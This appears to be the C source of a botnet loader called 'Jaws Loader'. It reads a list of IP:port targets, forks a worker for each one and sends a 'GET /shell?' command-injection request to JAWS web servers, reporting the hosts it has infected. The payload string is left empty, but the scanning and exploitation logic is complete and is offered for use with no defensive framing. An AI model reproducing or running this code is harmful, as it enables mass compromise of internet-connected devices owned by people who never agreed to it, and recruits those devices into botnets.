Jaws Loader

1.  
2. #define _GNU_SOURCE
3.  
4. #include <stdio.h>
5. #include <string.h>
6. #include <ctype.h>
7. #include <errno.h>
8. #include <stdlib.h>
9. #include <unistd.h>
10. #include <sys/socket.h>
11. #include <netinet/in.h>
12. #include <arpa/inet.h>
13. #include <sys/types.h>
14. #include <sys/wait.h>
15.  
16. #define INFO "[\x1b[33m?\x1b[37m]"
17. #define SUCCESS "[\x1b[32m+\x1b[37m]"
18. #define ERROR "[\x1b[31m-\x1b[37m]"
19. #define ARRAY_SIZE(Array) sizeof(Array) / sizeof(Array[0])
20.  
21. const char *Payload = "";
22. const char *Success = "listening tun0";
23.  
24. const char *UserAgents[] = {
25.     "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3",
26.     "Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)",
27.     "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)",
28.     "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1",
29.     "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1",
30.     "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)",
31.     "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A"
32.     "Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16"
33. };
34.  
35. void InfectJAWS(const char* IP, int Port, int Timeout)
36. {
37.     int Socket = -1;
38.     char Vulnerable = 0;
39.     struct sockaddr_in addr;
40.  
41.     struct timeval tv;
42.     tv.tv_sec = Timeout;
43.     tv.tv_usec = 0;
44.  
45.     char Headers[1024];
46.     snprintf(Headers, sizeof(Headers), "GET /shell?%s HTTP/1.1\r\nUser-Agent: %s\r\nHost: %s:%d\r\n" \
47.         "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nConnection: keep-alive\r\n\r\n",
48.         Payload, UserAgents[(rand() % ARRAY_SIZE(UserAgents))], IP, Port);
49.  
50.     if ((Socket = socket(AF_INET, SOCK_STREAM, 0)) == -1)
51.         return;
52.  
53.     if (setsockopt(Socket, SOL_SOCKET, SO_RCVTIMEO, (const char*)&tv, sizeof(struct timeval)) == -1)
54.     {
55.         close(Socket);
56.         return;
57.     }
58.  
59.     addr.sin_family = AF_INET;
60.     addr.sin_addr.s_addr = inet_addr(IP);
61.     addr.sin_port = htons(Port);
62.  
63.     if (connect(Socket, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)) == -1)
64.     {
65.         close(Socket);
66.         return;
67.     }
68.  
69.     int Read;
70.     char Recieve[BUFSIZ];
71.  
72.     if (write(Socket, Headers, strlen(Headers)) >= 0)
73.     {
74.         while ((Read = read(Socket, Recieve, sizeof(Recieve))) > 0)
75.         {
76.             Recieve[Read] = '\0';
77.             if (strstr(Recieve, Success) != NULL)
78.             {
79.                 Vulnerable = 1;
80.                 break;
81.             }
82.         }
83.     }
84.  
85.     close(Socket);
86.  
87.     if (Vulnerable)
88.         printf("%s Infected %s:%d\n", SUCCESS, IP, Port);
89. }
90.  
91. char *Trim(char *str)
92. {
93.     int i, Begin = 0;
94.     int End = strlen(str) - 1;
95.  
96.     while (isspace(str[Begin]))
97.         Begin++;
98.     while ((End >= Begin) && isspace(str[End]))
99.         End--;
100.     for (i = Begin; i <= End; i++)
101.         str[i - Begin] = str[i];
102.  
103.     str[i - Begin] = '\0';
104. }
105.  
106. int main(int argc, char const *argv[])
107. {
108.     if (argc != 4)
109.     {
110.         printf("%s Usage: %s <max forks> <ip:port list> <timeout (in seconds)>\n", INFO, argv[0]);
111.         return 1;
112.     }
113.  
114.     int i, Forks = 0;
115.     char Buffer[513];
116.     int MaxForks = atoi(argv[1]);
117.     int Timeout = atoi(argv[3]);
118.     FILE *IPs = fopen(argv[2], "r");
119.  
120.     if (IPs == NULL)
121.     {
122.         printf("%s Failed to open \"%s\"\n", ERROR, argv[1]);
123.         return 1;
124.     }
125.  
126.     printf("%s Running with %d max forks against \"%s\" with a timeout of %d %s\n\n", INFO, MaxForks, argv[2], Timeout, (Timeout > 1 ? "seconds" : "second"));
127.  
128.     while (fgets(Buffer, sizeof(Buffer) - 1, IPs))
129.     {
130.         Trim(Buffer);
131.         if (strlen(Buffer) < 3)
132.             break;
133.  
134.         char *Token = strtok(Buffer, ":");
135.         for (i = 0; i < strlen(Buffer) && Buffer[i] != ':'; i++);
136.  
137.         const char *IP = Buffer;
138.         int Port = atoi(Buffer + i + 1);
139.        
140.         if (!(fork()))
141.         {
142.             InfectJAWS(IP, Port, Timeout);
143.             exit(0);
144.         }
145.         else
146.         {
147.             Forks++;
148.             if (Forks++ > MaxForks)
149.                 for (Forks; Forks > MaxForks; Forks--)
150.                     wait(NULL);
151.         }
152.     }
153.  
154.     return 0;
155. }